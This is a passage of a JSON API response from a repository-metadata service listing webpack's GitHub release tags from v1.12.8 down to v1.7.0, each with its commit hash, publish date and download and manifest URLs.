v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpa